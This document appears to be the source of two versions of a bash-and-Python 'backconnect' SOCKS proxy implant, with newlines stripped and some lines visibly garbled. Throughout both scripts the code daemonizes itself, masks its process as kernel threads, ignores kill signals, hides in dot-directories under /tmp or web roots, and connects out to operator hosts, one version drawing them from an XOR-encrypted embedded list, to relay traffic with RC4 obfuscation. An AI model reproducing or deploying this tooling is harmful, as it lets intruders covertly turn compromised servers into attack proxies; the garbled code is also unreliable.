#!/bin/bash # Backconnect v23 - Full daemonize (based on v22) N="bcksocks";D=3;PD="" ENC_DATA="7e4f7d5756474b4d734b48040209794d604550444b467e5057080a1d7c4c625f5746565478535703070663406b4b5247574e7f514a110105634b66504d4b5d5a7a504a0b06077e5960534d405041655c411f0306794367515052564265574c041c0a755762505648514078454a071c01784c7d5c5b5c54417d5f4d0501137e4f7d5756474b4d734b48040509794d604550444b467e5057080a1d7c4c6b5f5746565478535703070663406b4b52475c4e7f514a110105634b66504d4b5d5a7a53490b06077e5960534d405041655c411f03057c4367515052564265574c041c0a755762535148514078454a071c01784c7d5c5b5c5442785f4d0501137e4f7d5756474b4d734b48070609794d604550444b467e5057080a1d7c4f665f5746565478535703070663406b4b5244534e7f514a110105634b66504d4b5d5a7a534e0b06077e5960534d405041655c411f0305754367515052564265574c041c0a755762535a48514078454a071c01784c7d5c5b5c54437b5f4d0501137e4f7d5756474b4d734b48060309794d604550444b467e5057080a1d7c4e615f5746565478535703070663406b4b5245564e7f514a110105634b66504d4b5d5a7a524d0b06077e5960534d405041655c411f0304784367515052564265574c041c0a755762525548514078454a071c01784c7d5c5b5c54437c5f4d0501137e4f7d5756474b4d734b48060a09794d604550444b467e5057080a1d7c4e6a5f5746565478535703070663406b4b524a554e7f514a110105634b66504d4b5d5a7a5d480b06077e5960534d405041655c411f030b7f4367515052564265574c041c0a7557625d5048514078454a071c01784c7d5c5b5c544c7f5f4d0501137b4b7d53535c54477a4b48060a09794d604555404b427b4b4802031d7c4e6a5f574656547d575707021d7c4a624b524a554e7f514a110401634f634b5241545a7a5d480b06077e5965574d44555a7a56481f030b7f436751505253466553491f03007c57625d5048514078454f031c057d576256525c544c7f5f4d0501137b4b7d53535c54477a4b48090709794d604555404b427b4b4802031d7c41655f574656547d575707021d7c4a624b524a524e7f514a110401634f634b5241545a7a5d410b06077e5965574d44555a7a56481f030b74436751505253466553491f03007c57625c5348514078454f031c057d576256525c544d7a5f4d0501137b4b7d53535c54477a4b48080009794d604555404b427b4b4802031d7c40605f574656547d575707021d7c4a624b524b514e7f514a110401634f634b5241545a7a5c4c0b06077e5965574d44555a7a56481f030a7b436751505253466553491f03007c57625c5448514078454f031c057d576256525c544d735f4d0501137b4b7d53535c54477a4b48080b09794d604555404b427b4b4802031d7f49635f574656547d575707021d7c4a624b5142544e7f514a110401634f634b5241545a79554b0b06077e5965574d44555a7a56481f00037e436751505253466553491f03007c5761555748514078454f031c057d576256525c57447e5f4d0501137b4b7d53535c54477a4b4b040109794d60" find_writable() { for d in /tmp /var/tmp /dev/shm /run "$HOME"; do [ -d "$d" ] && [ -w "$d" ] && { echo "$d/.$N"; return; } done echo "./.$N" } PD="$(find_writable)" fp() { # SAFE: only python processes by interpreter + path, no network search pgrep -f "python.*$PD.*$1.*$2" 2>/dev/null } kt() { fp "$1" "$2" | sort -u | xargs -r kill -9 2>/dev/null; sleep 0.3; } ka(){ # SAFE: only kill python with our path pgrep -f "python.*$PD" 2>/dev/null | xargs -r kill -9 2>/dev/null rm -rf "$PD" echo "Done" exit 0 } st(){ echo "Status:" [ -d "$PD" ] || { echo " None"; exit 0; } for f in "$PD"/*.pid; do [ -f "$f" ] || continue p=$(cat "$f") n=$(basename "$f" .pid) kill -0 "$p" 2>/dev/null && echo " + $n ($p)" || echo " - $n" done exit 0 } xc() { local k="$1" local d="$2" local o="" i=0 local kl="${#k}" [ "$kl" -eq 0 ] && { echo ""; return; } while [ $i -lt ${#d} ]; do local dc="${d:$i:2}" [ ${#dc} -lt 2 ] && break local db=$((16#$dc)) local ki=$((i/2%kl)) local kb=$(printf '%d' "'${k:$ki:1}") local xb=$((db^kb)) o+=$(printf '%02x' $xb) i=$((i+2)) done echo "$o" } s2h() { local s="$1" o="" i; for ((i=0;i<${#s};i++)); do o+=$(printf '%02x' "'${s:$i:1}"); done; echo "$o"; } h2s() { local h="$1" o="" i; for ((i=0;i<${#h};i+=2)); do o+=$(printf "\\x${h:$i:2}"); done; echo -e "$o"; } enc_srv() { local k="$1"; shift; echo "ENC_DATA=\"$(xc "$k" "$(s2h "$*")")\""; } dec_srv() { [ -z "$2" ] && return; h2s "$(xc "$1" "$2")"; } spawn() { local host="$1" port="$2" id="$3" mkdir -p "$PD" 2>/dev/null local pidf="$PD/${id}.pid" local pyf="$PD/${id}.py" cat > "$pyf" << PYEND import socket,select,threading,random,time,os,sys,signal # === THREAD STACK SIZE (128KB instead of 8MB default) === try: threading.stack_size(131072) except: pass # === DAEMONIZE === def daemonize(pidfile): if os.fork() > 0: sys.exit(0) os.setsid() if os.fork() > 0: sys.exit(0) try: os.chdir('/') except: pass os.umask(0) for fd in range(3, 64): try: os.close(fd) except: pass sys.stdin = open('/dev/null', 'r') sys.stdout = open('/dev/null', 'w') sys.stderr = open('/dev/null', 'w') if pidfile: try: with open(pidfile, 'w') as f: f.write(str(os.getpid())) except: pass # === MASK PROCESS NAME === def mask_process(): names = ['kworker','migration','ksoftirqd','watchdog','rcu_sched','kswapd'] suffix = ['','/0','/1','/0:0','/0:1'] pn = random.choice(names) + random.choice(suffix) try: import ctypes libc = ctypes.CDLL('libc.so.6') libc.prctl(15, pn.encode(), 0, 0, 0) except: pass try: with open('/proc/self/comm', 'wb') as f: f.write(pn.encode()[:15]) except: pass H,P='${host}',${port} PF='${pidf}' daemonize(PF) mask_process() # Ignore ALL relevant signals including SIGPIPE for s in [1, 2, 13, 15]: try: signal.signal(s, signal.SIG_IGN) except: pass x=bytearray([random.randint(0,254) for _ in range(50)]) def rc4(p,b,s,z): L=len(p) for i in range(z):b[s+i]^=p[i%L] r=list(range(256));j=0 for i in range(256):j=(j+r[i]+p[i%L])&255;r[i],r[j]=r[j],r[i] i=j=0 for k in range(z): i=(i+1)&255;j=(j+r[i])&255;r[i],r[j]=r[j],r[i] b[s+k]^=r[(r[i]+r[j])&255] for i in range(z):b[s+i]^=p[i%L] SS=None SL=threading.Lock() # Lock для отправки на сервер AL=threading.Lock() # Lock для sa/sk массивов sa=[0]*200 sk=[None]*200 wc=0 # Worker count MAX_WORKERS=200 ALIVE=True # Флаг для остановки workers при реконнекте GEN=0 # Generation counter для определения старых workers def ssend(d,gen): """Отправка с защитой от SIGPIPE и проверкой generation""" global SS,GEN try: with SL: if SS and gen==GEN: # Используем send с таймаутом вместо sendall внутри lock SS.settimeout(5) try: SS.sendall(d) except (BrokenPipeError, ConnectionResetError, OSError): return 0 finally: SS.settimeout(None) return 1 except: return 0 def worker(n,cs,b0,gen): """Worker с проверкой generation""" global sa,sk,wc,GEN,ALIVE r=bytearray([n,10,0,5,1,0,1,0,0,0,0,0,0]) ok=0 try: if b0[7]==3: dl=b0[8];dom=b0[9:9+dl].decode('latin-1');pt=(b0[9+dl]<<8)|b0[9+dl+1] elif b0[7]==1: dom=f"{b0[8]}.{b0[9]}.{b0[10]}.{b0[11]}";pt=(b0[12]<<8)|b0[13] else:raise Exception() cs.settimeout(10) cs.connect((dom,pt)) cs.setsockopt(socket.IPPROTO_TCP,socket.TCP_NODELAY,1) cs.settimeout(None) # Будем использовать select with AL: if gen==GEN and ALIVE: # Проверяем что не было реконнекта sa[n]=1;sk[n]=cs r[4]=0;ok=1 except: try:cs.close() except:pass rc4(x,r,0,3);rc4(x,r,3,10);ssend(bytes(r),gen) if ok: try: while True: # Проверяем флаги with AL: if sa[n]!=1 or gen!=GEN or not ALIVE:break # select с exceptfds для обнаружения ошибок try: rl,_,el=select.select([cs],[],[cs],1) except:break if el:break # Ошибка на сокете if rl: try: d=cs.recv(65530) except:break if not d:break buf=bytearray([n,len(d)&255,(len(d)>>8)&255])+bytearray(d) rc4(x,buf,0,3);rc4(x,buf,3,len(d)) if not ssend(bytes(buf),gen):break except:pass with AL: sa[n]=0;sk[n]=None if wc>0:wc-=1 try:cs.close() except:pass # Отправляем уведомление о закрытии только если generation совпадает if gen==GEN: r[1]=r[2]=0;rc4(x,r,0,3);ssend(bytes(r[:3]),gen) def main(): global SS,sa,sk,wc,ALIVE,GEN # Увеличиваем generation и останавливаем старые workers with AL: GEN+=1 ALIVE=True wc=0 for i in range(200): sa[i]=0 c=sk[i];sk[i]=None if c: try:c.close() except:pass gen=GEN # Локальная копия для этой сессии rm=r4=ebx=edx=0;b0=bytearray();ex=0;ka_time=time.time() try: SS=socket.socket(socket.AF_INET,socket.SOCK_STREAM) SS.setsockopt(socket.IPPROTO_TCP,socket.TCP_NODELAY,1) SS.setsockopt(socket.SOL_SOCKET,socket.SO_KEEPALIVE,1) SS.settimeout(10) SS.connect((H,P)) SS.settimeout(None) hs=bytearray(100);hs[:50]=x;hs[50]=255;hs[51]=255;hs[54:60]=b"Python" rc4(x,hs,50,50);SS.sendall(bytes(hs)) while ALIVE and gen==GEN: if r4<4: # select с exceptfds try: rl,_,el=select.select([SS],[],[SS],60) except:break if el:break # Ошибка на сокете if not rl: if time.time()-ka_time>60: ka=bytearray(3);rc4(x,ka,0,3) if not ssend(bytes(ka),gen):break ka_time=time.time() continue try: d=SS.recv(4-r4) except:break if not d:break b0.extend(d);r4+=len(d);ka_time=time.time() if r4==4:rc4(x,b0,0,4);ebx=b0[1];edx=b0[2]|(b0[3]<<8) if r4==4: if edx==0: if len(b0)>=2 and b0[0]==255 and b0[1]==254:ex=1;break if 01048576:break # Max 1MB need=edx-rm if need>0: try: d=SS.recv(min(need,65536)) except:break if not d:break b0.extend(d);rm+=len(d) if rm==edx: rc4(x,b0,4,rm) if b0[0]==0: # ВАЖНО: Проверка диапазона ebx ПЕРЕД созданием worker if 0=MAX_WORKERS: r4=0;rm=0;b0=bytearray() continue wc+=1 cs=socket.socket(socket.AF_INET,socket.SOCK_STREAM) t=threading.Thread(target=worker,args=(ebx,cs,bytes(b0),gen),daemon=True) t.start() else: if 0/dev/null && return 0 return 1 } ir() { fp "$1" "$2" 2>/dev/null | grep -q .; } SRV=();FORCE=0 case "${1:-}" in -h|--help) echo "Usage: $0 [-f] srv:port..." echo " -e KEY srv:port... Encrypt" echo " -d KEY [-f] Decrypt+run" echo " -k / -s Kill/Status" exit 0 ;; -k) ka ;; -s) st ;; -e) [ -z "$2" ] && { echo "Need KEY"; exit 1; } K="$2"; shift 2 [ $# -eq 0 ] && { echo "Need servers"; exit 1; } enc_srv "$K" "$@" exit 0 ;; -d) [ -z "$2" ] && { echo "Need KEY"; exit 1; } K="$2"; shift 2 [ "${1:-}" = "-f" ] && { FORCE=1; shift; } [ -z "$ENC_DATA" ] && { echo "No encrypted data"; exit 1; } DE=$(dec_srv "$K" "$ENC_DATA") [ -z "$DE" ] && { echo "Decryption failed"; exit 1; } for s in $DE; do [[ "$s" == *:* ]] && SRV+=("$s") || SRV+=("$s:443"); done ;; -f) FORCE=1; shift for a in "$@"; do [[ "$a" == *:* ]] && SRV+=("$a") || SRV+=("$a:443"); done ;; *) for a in "$@"; do [[ "$a" == *:* ]] && SRV+=("$a") || SRV+=("$a:443"); done ;; esac [ ${#SRV[@]} -eq 0 ] && { echo "No servers. Use -h"; exit 1; } command -v python3 &>/dev/null || { echo "python3 required"; exit 1; } mkdir -p "$PD"; c=0 for s in "${SRV[@]}"; do h="${s%:*}"; p="${s#*:}"; id="${h}_${p}" c=$((c+1)) if ir "$h" "$p"; then if [ "$FORCE" = "1" ]; then printf "[$c/${#SRV[@]}] $h:$p replacing... " kt "$h" "$p" else echo "[$c/${#SRV[@]}] $h:$p running (use -f)" [ "$c" -lt "${#SRV[@]}" ] && sleep "$D" continue fi else printf "[$c/${#SRV[@]}] $h:$p " fi spawn "$h" "$p" "$id" && echo "OK" || echo "FAIL" [ "$c" -lt "${#SRV[@]}" ] && sleep "$D" done echo "Done" #!/bin/bash # Backconnect v9.0 - WORKING VERSION N="bcksocks";D=15;PD="" find_writable() { for d in /tmp /var/tmp /dev/shm /run \ /var/www/html /var/www /srv/www /srv/http \ /home/*/public_html /home/*/www /home/*/web \ /usr/share/nginx/html /usr/share/apache2/htdocs \ /var/www/*/public /var/www/*/html \ /opt/lampp/htdocs /opt/bitnami/apache/htdocs \ "$HOME/public_html" "$HOME/www" "$HOME"; do [ -d "$d" ] && [ -w "$d" ] && { echo "$d/.$N"; return; } done echo "./.$N" } PD="$(find_writable)" ka(){ pkill -9 -f "$N" 2>/dev/null;rm -rf "$PD";echo "Done";exit 0; } st(){ echo "Status:";[ -d "$PD" ]||{ echo " None";exit 0; } for f in "$PD"/*.pid;do [ -f "$f" ]||continue;p=$(cat "$f");n=$(basename "$f" .pid) kill -0 "$p" 2>/dev/null&&echo " + $n ($p)"||echo " - $n";done;exit 0; } spawn() { local host="$1" port="$2" id="$3" mkdir -p "$PD" 2>/dev/null local pidf="$PD/${id}.pid" local pyf="$PD/${id}.py" cat > "$pyf" << PYEND import socket,select,threading,random,time,os,sys,signal,errno H='$host' P=$port x=bytearray(50) for i in range(50):x[i]=int(random.random()*255) def R(p,l,b,s,z): r=list(range(256));p0=p1=p2=p3=p4=p5=p6=p7=p8=0;c=z;i=0;j=0;g=0 while c>0:b[s+i]^=p[j];i+=1;j+=1;c-=1;j=0 if j==l else j while 1: if g==0:p2=0;p3=l if g!=0: g=0;p2+=1;p3-=1 if p3==0:continue p7=r[p0];t=p[p2];p1+=t;p1&=255;p1+=p7;p1&=255;p6=r[p1];r[p0]=p6;r[p1]=p7;p0+=1;p0&=255 if p0!=0:g=1;continue p4=z;p1=p0=p2=p3=0 while 1: p2+=1;p2&=255;p7=r[p2];p1+=p7;p1&=255;p8=r[p1];r[p2]=p8;r[p1]=p7;p8+=p7;p8&=255;p0=r[p8] p5=b[s+p3];p5^=p0;b[s+p3]=p5;p3+=1;p4-=1 if p4==0:break break i=0;c=z;j=0 while c>0:b[s+i]^=p[j];i+=1;j+=1;c-=1;j=0 if j==l else j L=threading.Lock() def T(k,d): with L: try:k.sendall(d);return 1 except:return 0 sa=[0]*200;sk=[None]*200;sL=threading.Lock() def C(n,sS,cS,b0): def w(): r=bytearray([n,0x0A,0,5,1,0,1,0,0,0,0,0,0]);d='';pt=0;o=0 try: cS.setsockopt(6,1,1);cS.setblocking(0) if b0[7]==3: dl=b0[8];d=b0[9:9+dl].decode('latin-1');pt=(b0[9+dl]<<8)|b0[9+dl+1] elif b0[7]==1: d="{}.{}.{}.{}".format(b0[8],b0[9],b0[10],b0[11]);pt=(b0[12]<<8)|b0[13] else:raise Exception() try:cS.connect((d,pt)) except BlockingIOError:pass except socket.error as e: if e.errno!=errno.EINPROGRESS:raise _,wl,_=select.select([],[cS],[],10) if wl: e=cS.getsockopt(socket.SOL_SOCKET,socket.SO_ERROR) if e==0: cS.setblocking(0) with sL:sa[n]=1;sk[n]=cS r[4]=0;o=1 else:raise Exception() else:raise Exception() except: try:cS.close() except:pass R(x,50,r,0,3);R(x,50,r,3,10);T(sS,bytes(r));R(x,50,r,0,3) if o: while sa[n]==1: try: cs=sk[n] if not cs:break rl,_,_=select.select([cs],[],[],1) if not rl:continue dt=cs.recv(65530) if not dt:break b=bytearray([n,len(dt)&255,(len(dt)>>8)&255])+bytearray(dt) R(x,50,b,0,3);R(x,50,b,3,len(dt)) if not T(sS,bytes(b)):break except:break with sL:sa[n]=0 cs=sk[n] if cs: try:cs.close() except:pass r[1]=0;r[2]=0;R(x,50,r,0,3);T(sS,bytes(r[:3])) threading.Thread(target=w,daemon=1).start() def B(): rm=r4=ebx=edx=0;b0=bytearray();bn=bytearray(3);ex=0 try: sk[0]=socket.socket(2,1);sk[0].setsockopt(6,1,1);sk[0].connect((H,P)) b=bytearray(100);b[:50]=x;b[50]=255;b[51]=255;b[54:60]=b"Python" R(x,50,b,50,50);sk[0].sendall(bytes(b)) while 1: if r4!=4: rl,_,_=select.select([sk[0]],[],[],60) if not rl: if bn!=bytearray(3)or rm or r4:break R(x,50,bn,0,3);T(sk[0],bytes(bn));bn=bytearray(3);continue if rm or r4==4: if edx==0: if len(b0)>=2 and b0[0]==255 and b0[1]==254:ex=1;break elif 0/dev/null 2>&1 & sleep 1 [ -f "$pidf" ] && pid=$(cat "$pidf") && kill -0 "$pid" 2>/dev/null && return 0 return 1 } SRV=();PT="" case "${1:-}" in -h|--help)echo "Usage: $0 HOST:PORT [...] | -p PORT IP [...] | -f file | -k | -s";exit 0;; -k)ka;;-s)st;; -p)PT="$2";shift 2;for i in "$@";do SRV+=("$i:$PT");done;; -f)[ -f "$2" ]||{ echo "No file";exit 1; } while IFS= read -r l||[ -n "$l" ];do l="${l//[[:space:]]/}";[[ -z "$l"||"$l"==\#* ]]||SRV+=("$l");done<"$2";; *)for a in "$@";do [[ "$a"==*:* ]]&&SRV+=("$a")||SRV+=("$a:443");done;; esac [ ${#SRV[@]} -eq 0 ]&&{ echo "Usage: $0 -h";exit 1; } command -v python3 &>/dev/null||{ echo "python3?";exit 1; } mkdir -p "$PD";c=0 for s in "${SRV[@]}";do h="${s%:*}";p="${s#*:}";id="${h}_${p}" c=$((c+1)) [ -f "$PD/${id}.pid" ]&&oldpid=$(cat "$PD/${id}.pid")&&kill -0 "$oldpid" 2>/dev/null&&{ echo "[$c/${#SRV[@]}] $h:$p running";[ "$c" -lt "${#SRV[@]}" ]&&sleep "$D";continue; } printf "[$c/${#SRV[@]}] $h:$p " spawn "$h" "$p" "$id" && echo "OK" || echo "FAIL" [ "$c" -lt "${#SRV[@]}" ]&&sleep "$D" done echo "Done"